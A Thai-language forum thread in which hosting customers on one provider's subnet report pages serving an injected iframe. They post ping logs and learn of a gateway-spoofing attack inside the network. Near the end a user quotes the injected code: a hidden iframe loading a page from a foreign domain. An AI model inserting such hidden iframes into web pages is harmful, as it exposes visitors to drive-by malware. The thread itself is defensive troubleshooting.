ลองดูตามภาพครับ
ไม่ทราบใช่ไวรัส iframe ที่ว่ากันหรือเปล่า ถ้าเข้าใจผิดต้องขออภัยด้วยครับ
ตอนนี้เห็นเป็นเว็บปกตินะคะ
อาการเดียวกะที่ Pacnet โดนเลยอะ :08a:
เครื่องนี้ไม่มีการแก้ไขข้อมูลมานานมากๆ แล้วครับ
service เปิดแค่ ssh กับ http
แทบไม่มีโอกาสโดน hack เลย (ยกเว้น apache มีบั๊กเอง ซึ่ง centos ล่ะครับ)
แล้วที่แน่ๆ รู้สึกเครือข่าย cslox class 203.146.170.* ทั้งหมด รวนมากๆ เลยด้วยตอนนี้
เครื่องเว็บฝากรูปของผม
64 bytes from 203.146.170.85: icmp_seq=119 ttl=63 time=230 ms
64 bytes from 203.146.170.85: icmp_seq=123 ttl=63 time=7178 ms
64 bytes from 203.146.170.85: icmp_seq=131 ttl=63 time=168 ms
64 bytes from 203.146.170.85: icmp_seq=136 ttl=63 time=174 ms
64 bytes from 203.146.170.85: icmp_seq=138 ttl=63 time=464 ms
64 bytes from 203.146.170.85: icmp_seq=157 ttl=63 time=190 ms
64 bytes from 203.146.170.85: icmp_seq=163 ttl=63 time=128 ms
นี่เครื่อง stats
64 bytes from 203.146.170.54: icmp_seq=88 ttl=63 time=131 ms
64 bytes from 203.146.170.54: icmp_seq=89 ttl=63 time=1371 ms
64 bytes from 203.146.170.54: icmp_seq=94 ttl=63 time=166 ms
64 bytes from 203.146.170.54: icmp_seq=95 ttl=63 time=124 ms
64 bytes from 203.146.170.54: icmp_seq=96 ttl=63 time=117 ms
64 bytes from 203.146.170.54: icmp_seq=97 ttl=63 time=115 ms
64 bytes from 203.146.170.54: icmp_seq=99 ttl=63 time=131 ms
โอ๊ะ ดูเหมือนจะติดไวรัสกลับมาอีกแล้วค่ะ
เหมือนจะเป็น เป็นช่วงๆครับ
พอดีว่าใช้ stat ของที่นี้อยู่ เข้าไปเจอเลยเอามาบอกครับ
:blink: มันสะดุดไปหน่อยป่ะนั่น แต่คงไม่น่ามีปัญหาอะไรครับ
ปุ๊ก
สงสัย นับข้อมูลไม่ไหว
ไม่ได้เป็นที่เครื่องของ stats ชัวร์ 100% ครับ
แจ้งเจ้าหน้าที่ แก้ไขเรียบร้อย ตอนนี้ปกติดีแล้วครับ
ทีนี้รอคำชี้แจงว่าเป็นอะไรต่อ…
ได้ข้อมูลมาและครับ
มีการทำ ip spoofing ปลอมตัวเองเป็น gateway
แล้วดัก+ปลอมแปลงข้อมูล ก่อนส่งออกนอกเครือข่าย
(น่าจะ หรืออาจจะมีเครื่องใน vlan นั้นโดน hack ทำให้ทำแบบนี้ได้)
โอ้…
:ph34r: ปลอมตัวเองเป็น GW เหอๆ
ปุ๊ก
ใช้อยู่หลายเว็บเหมือนกัน อิิอิ
ไม่เคยใช้เลย
เอาอีกแล้ว >(
อาการเดียวกันเลยกับที่ผมโดน
http://www.thaihosttalk.com/th1/index.php?topic=11694.0
รายงานเพิ่มเติมครับ
CSLoxinfo 203.146.140.128/25
(ช่วง IP 203.146.140.128 - 203.146.140.255)
โดนเล่นงานเป็นหย่อมๆ
วิธีแก้เบื้องต้น ถ้า ssh เข้าไปได้ก็สั่ง restart network ครับ
windows ให้กด repair network ใหม่
centos/fedora สั่ง /etc/init.d/network restart
ubuntu/debian ไม่ทราบครับ แหะๆ
โดนกันทั่วถึง พึ่งโดนตะกี้เอง ที่คุณไอซ์ Post นี่แหละครับ หุหุ ^^
พี่ยังรอคำตอบอยู่นะครับเจี๋ย
ปุ๊ก
โดนเหมือนกันครับ
แก้แล้ว ได้สักพัก กลับมาเป็นอีกแล้ว ทำไงถึงจะหายครับ เสียอารมณ์
ดูสคริปต์มัน
<iframe src=http://4dsaijd3.cn/jj4.htm width=20 height=0 frameborder=0></iframe>
64 bytes from 203.146.170.99: icmp_seq=1 ttl=127 time=3.67 ms
64 bytes from 203.146.170.99: icmp_seq=2 ttl=127 time=5.42 ms
64 bytes from 203.146.170.99: icmp_seq=3 ttl=127 time=6.64 ms
64 bytes from 203.146.170.99: icmp_seq=4 ttl=127 time=7.11 ms
64 bytes from 203.146.170.99: icmp_seq=5 ttl=127 time=7.17 ms
สั่ง restart network อีกทีครับ